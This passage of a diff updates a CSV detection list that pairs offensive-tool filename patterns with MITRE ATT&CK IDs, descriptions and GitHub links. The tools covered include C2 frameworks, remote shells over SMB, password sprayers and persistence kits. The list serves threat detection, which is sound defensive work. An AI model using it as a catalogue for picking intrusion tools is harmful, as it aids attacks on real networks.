TA0008","N/A","N/A","Frameworks","https://github.com/mdsecactivebreach/SharpShooter","1","1","N/A","N/A","10","1681","352","2022-03-16T15:36:54Z","2018-03-06T20:04:20Z" +"*SharpShares.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpShellPipe.exe*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*SharpShellPipe.sln*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*SharpShellPipe-main*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*SharpShooter*","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1564 - T1204 - T1059 - T1105","TA0002 - TA0011 - TA0008","N/A","N/A","Frameworks","https://github.com/mdsecactivebreach/SharpShooter","1","1","N/A","N/A","10","1683","352","2022-03-16T15:36:54Z","2018-03-06T20:04:20Z" "*SharpShot.exe /*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" -"*Sharp-SMBExec.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpSniper.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*Sharp-SMBExec.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSniper.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpSocks.exe*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*SharpSocks.pfx*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*SharpSocks.resx*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" @@ -16712,8 +16895,8 @@ "*SharpSocksImplant*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*SharpSocksServer*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*SharpSpawner.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*SharpSphere.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpSploit*","offensive_tool_keyword","SharpSploit","SharpSploitis a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1059 - T1027 - T1505","TA0002 - TA0003 - TA0008 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","1632","321","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" +"*SharpSphere.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSploit*","offensive_tool_keyword","SharpSploit","SharpSploitis a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1059 - T1027 - T1505","TA0002 - TA0003 - TA0008 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","1632","322","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*SharpSploit.dll*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" "*SharpSploitConsole_x*","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","10","10","275","59","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z" "*SharpSploitDomainRecon*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" @@ -16722,17 +16905,17 @@ "*SharpSpoolTrigger.exe*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" "*SharpSpray*","offensive_tool_keyword","SharpSpray","This project is a C# port of my PowerSpray.ps1 script. SharpSpray a simple code set to perform a password spraying attack against all users of a domain using LDAP and is compatible with Cobalt Strike.","T1110 - T1558","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/jnqpblc/SharpSpray","1","1","N/A","N/A","2","176","36","2019-06-30T03:10:52Z","2019-03-04T17:14:07Z" "*SharpSpray.exe *","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" -"*SharpSpray.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSpray.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpSQLPwn*","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/lefayjey/SharpSQLPwn","1","1","N/A","N/A","1","74","15","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z" -"*SharpSQLPwn.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSQLPwn.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpStay.csproj*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*Sharpstay.exe *","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" -"*SharpStay.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" -"*SharpStay.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpStay.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*SharpStay.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpStay.sln*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*SharpStay-master*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" -"*Sharp-Suite.git*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" -"*SharpSvc.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*Sharp-Suite.git*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*SharpSvc.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpSword.csproj*","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" "*SharpSword.exe*","offensive_tool_keyword","cobaltstrike","Read the contents of DOCX files using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","10","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" "*SharpSword.exe*","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" @@ -16741,9 +16924,9 @@ "*SharpSystemTriggers.git*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" "*SharpSystemTriggers.sln*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" "*SharpSystemTriggers-main*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" -"*SharpTask.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*sharptelnet *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 